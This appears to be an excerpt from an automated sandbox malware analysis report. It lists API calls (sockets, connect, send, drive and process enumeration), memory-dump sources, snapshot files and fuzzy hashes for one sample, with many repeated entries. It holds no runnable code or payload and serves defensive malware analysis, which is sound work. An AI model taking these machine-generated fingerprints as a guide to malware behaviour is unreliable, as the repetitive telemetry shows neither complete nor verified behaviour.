                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: bf1eedd9cd5186a6c3718188867819f147d894adf516ee7f3b3c99b6edad1908
                                                              • Instruction ID: 2eab1b953f421919c636a68f8dc73d211ec43dfa4c697a4538f98989aeb6c236
                                                              • Opcode Fuzzy Hash: bf1eedd9cd5186a6c3718188867819f147d894adf516ee7f3b3c99b6edad1908
                                                              • Instruction Fuzzy Hash: EB017BD4E403405AF750BB389D17B6735901B91304F4A157EA888912F3F72DC889C253

                                                               Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed). Entry block 57aa30-57aa64; block 57ab96 calls socket, block 57abd0 calls ioctlsocket, and block 57ada0 calls connect.
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0057AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0057ABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: 7a06e6efdd740742127acf249e5e8bed5a2e24e8f3d5ad5463a6aaccbcfbf105
                                                              • Instruction ID: f9880850e7a63879280003b92cd6c7a47bd661d8f8c90aea8b9a5438b5e05eac
                                                              • Opcode Fuzzy Hash: 7a06e6efdd740742127acf249e5e8bed5a2e24e8f3d5ad5463a6aaccbcfbf105
                                                              • Instruction Fuzzy Hash: 21E1A0706043029BEB20CF24D885B6B7BA5FFC5310F148A28F99D9B291E775D944EB93
APIs
• Process32FirstW.KERNEL32(?,?,?), ref: 07180403
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
Similarity
• API ID: FirstProcess32
• String ID: PR
• API String ID: 2623510744-2536945133
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID:
• String ID: A:\
• API String ID: 0-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• Process32FirstW.KERNEL32(?,?,?), ref: 07180403
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
Similarity
• API ID: FirstProcess32
• String ID: PR
• API String ID: 2623510744-2536945133
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
• GetLogicalDrives.KERNELBASE ref: 07140328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
Similarity
• API ID: DrivesLogical
• String ID: A:\
• API String ID: 999431828-3379428675
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
Similarity
• API ID: CloseEvent
• String ID: multi.c
• API String ID: 2624557715-214371023
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
Similarity
• API ID:
• String ID: PR
• API String ID: 0-2536945133
APIs
• Process32FirstW.KERNEL32(?,?,?), ref: 07180403
Strings
Memory Dump Source
• Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
Similarity
• API ID: FirstProcess32
• String ID: PR
• API String ID: 2623510744-2536945133
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
Similarity
• API ID: closesocket
• String ID: FD %s:%d sclose(%d)
• API String ID: 2781271927-3116021458
APIs
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0057B29E,?,00000000,?,?), ref: 0057B0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00563C41,00000000), ref: 0057B0C1
Memory Dump Source
• Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: b515b450bdc2e1b802fcc9c0f2dffff589cdd1cff56ee186769c911f74a5e629
                                                              • Instruction ID: aed7dab7b4ec3a285f5bffa224d5e5e71e3efd99559740ccc5efd667a0eecc87
                                                              • Opcode Fuzzy Hash: b515b450bdc2e1b802fcc9c0f2dffff589cdd1cff56ee186769c911f74a5e629
                                                              • Instruction Fuzzy Hash: E601D8362042009FEA205A68EC88F6BBBA9FF89364F044B54F97C931E1D726ED50A751
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 24411247e48f99ab7119935c68c1c7ca7024309451620a255907da23651828e0
                                                              • Instruction ID: 7db7ad17a47aa1118f60983316470432935b5a4b99f0ba780b02dbeb996f2663
                                                              • Opcode Fuzzy Hash: 24411247e48f99ab7119935c68c1c7ca7024309451620a255907da23651828e0
                                                              • Instruction Fuzzy Hash: D431D5EB16D120BE714A81572B14AF66E7DE7CB630B3284BAF907C65C2E3880F4D5031
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: d29efb6b437f92b5ec3ff242c9d27aee3ebb450884ca7def59d31400a8aab8b0
                                                              • Instruction ID: 891c441a4b9953b8ac7765d4015a3361ca1d5f687d1869ab3015849e4e9ae2dd
                                                              • Opcode Fuzzy Hash: d29efb6b437f92b5ec3ff242c9d27aee3ebb450884ca7def59d31400a8aab8b0
                                                              • Instruction Fuzzy Hash: 4831C4EB169121BE624A81572754AF66E7EE7CF630B3284B6F907C55C2E3980F495031
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00564AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: b6e831aaf2b1824493647b232ebbb7144dc13d896b6884b22dc3bc54fb3780d3
                                                              • Instruction ID: 52ba10bb50a8e820b027d978f0cf018cd90d0645a1afcda1eea60bba8fd2c1af
                                                              • Opcode Fuzzy Hash: b6e831aaf2b1824493647b232ebbb7144dc13d896b6884b22dc3bc54fb3780d3
                                                              • Instruction Fuzzy Hash: 4051DF706047019BEB309B69DD497277EE4BF41319F14193CE98A8B6E1EB75E884CF02
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 2c94018f280128871516da7cad3f037503c9bf19c75183f0dac1e76aa6ce17f8
                                                              • Instruction ID: baddda38c82133ca54f3b623f5b8e2546046341af1519e62b9aa6d4759d2f53e
                                                              • Opcode Fuzzy Hash: 2c94018f280128871516da7cad3f037503c9bf19c75183f0dac1e76aa6ce17f8
                                                              • Instruction Fuzzy Hash: B431E4EB56D120BE620A81972754AF66E7EE7CF630B3284B6F903C55C2E3980F4D5031
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: a7158117fe9936c48b91f3276db7e5043f61bbe951a96b47edf824d3828e069e
                                                              • Instruction ID: 6b63a03ad4051c569751d517d0f55df0e0aa311e72bbaba18e40ec7fd262f3ad
                                                              • Opcode Fuzzy Hash: a7158117fe9936c48b91f3276db7e5043f61bbe951a96b47edf824d3828e069e
                                                              • Instruction Fuzzy Hash: FC3106EB56D121BEB20A91572B54AF66E7DE7CB230B3284BAF503C65C2E3940F4D5031
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: c33cf89cb6e539676be7501e5d2ce72aa40373386492e7949ba181180111fb1a
                                                              • Instruction ID: 8da42123fb0059b495d5f0566187923061cd76922697d4c7f910da49bf674ae1
                                                              • Opcode Fuzzy Hash: c33cf89cb6e539676be7501e5d2ce72aa40373386492e7949ba181180111fb1a
                                                              • Instruction Fuzzy Hash: 8631C7EB16D120BE724A85972754AF66E7EE7CB630B3284B6F903D55C2E3880F4D5131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: acf905c10dd31d725f8de4d0c4d2317b7373a2a07867a6396fd4f33961c854f9
                                                              • Instruction ID: 101b9aed99619f1baa2750f584755c102061d5cdd5f23a5603fa35906b3f542f
                                                              • Opcode Fuzzy Hash: acf905c10dd31d725f8de4d0c4d2317b7373a2a07867a6396fd4f33961c854f9
                                                              • Instruction Fuzzy Hash: 8731D4EB16C120BEB24A81972B54AF66E7DE6CB630B3284B6F907C5582E3C40F4E5131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 25f3c87b8da2a9ed70f0b4e5007d9c48ba4db8d5db995af7fedd78c97cb8142f
                                                              • Instruction ID: 4861d900016dacd40349766826468a1b8a9773a7d54b1722945432fedcbbe1b6
                                                              • Opcode Fuzzy Hash: 25f3c87b8da2a9ed70f0b4e5007d9c48ba4db8d5db995af7fedd78c97cb8142f
                                                              • Instruction Fuzzy Hash: 7421E7EB16D120BE720A91972B546F66E7DE6CB630B3284BBF507C6982E3D80F4D5131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5322c603608d393ae0d3b386c0560015386d85b4401bb93cc06cfcc76b58f1d2
                                                              • Instruction ID: 34a91fe3362a0b2426bdf822472fff92bebeaa9f571777119f7f8e8fc944e8ae
                                                              • Opcode Fuzzy Hash: 5322c603608d393ae0d3b386c0560015386d85b4401bb93cc06cfcc76b58f1d2
                                                              • Instruction Fuzzy Hash: 4021E6EB56C220BEB20A919727547F66F69E7CB230B3284B7F503C6582E3980F4E5131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: f3f58f0eb9d7eb5f0235b98c7f351a0382b26fa0dc9914d02cb60f694d27238d
                                                              • Instruction ID: 0e98b5bae2470ce2f119680f31e74ed3a547260abd8e159a76f5869a5aafc066
                                                              • Opcode Fuzzy Hash: f3f58f0eb9d7eb5f0235b98c7f351a0382b26fa0dc9914d02cb60f694d27238d
                                                              • Instruction Fuzzy Hash: A02106FB16C110BE720A91672B546F66F7DEACB630B3284B6F507C6582E3980E4A5131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 9f1ecf72adad81a01d6ae7537ee08c78bca96c77d048f0aebda30da44566e7c2
                                                              • Instruction ID: 03de8bdc40cd18c33ba0887e95e5fe8558bdad4c2a2498f48f6c5a1baf94a8dd
                                                              • Opcode Fuzzy Hash: 9f1ecf72adad81a01d6ae7537ee08c78bca96c77d048f0aebda30da44566e7c2
                                                              • Instruction Fuzzy Hash: 6921C4FB26C210BEB20A959727546F66E79E6CB630B3284B6F503C6582E7980F4D5131
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0057AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 5d15a6eec5541786b1c98b115fb0df91bc54de2556a6562e01027f4d78a5a54f
                                                              • Instruction ID: e28617b2bb4b8a3d0db48759e95cc4dbed2dbfe617836d18e85e6a61d5e2df2a
                                                              • Opcode Fuzzy Hash: 5d15a6eec5541786b1c98b115fb0df91bc54de2556a6562e01027f4d78a5a54f
                                                              • Instruction Fuzzy Hash: D211967080878595EB268F18D4067F6B7F4FFD0329F10DA19E59942150F7325AC59BC2
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0057A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                              • Instruction ID: 69fd17fc71ebc6e969a57137627ad345dfb2c137835a895f895dad3775b734ed
                                                              • Opcode Fuzzy Hash: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                              • Instruction Fuzzy Hash: 1F01A272B01710AFC6148F24EC85B5ABBA5FFC4720F068659FA982B361C331AC109BD1
                                                              APIs
                                                              • socket.WS2_32(?,0057B280,00000000,-00000001,00000000,0057B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0057AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
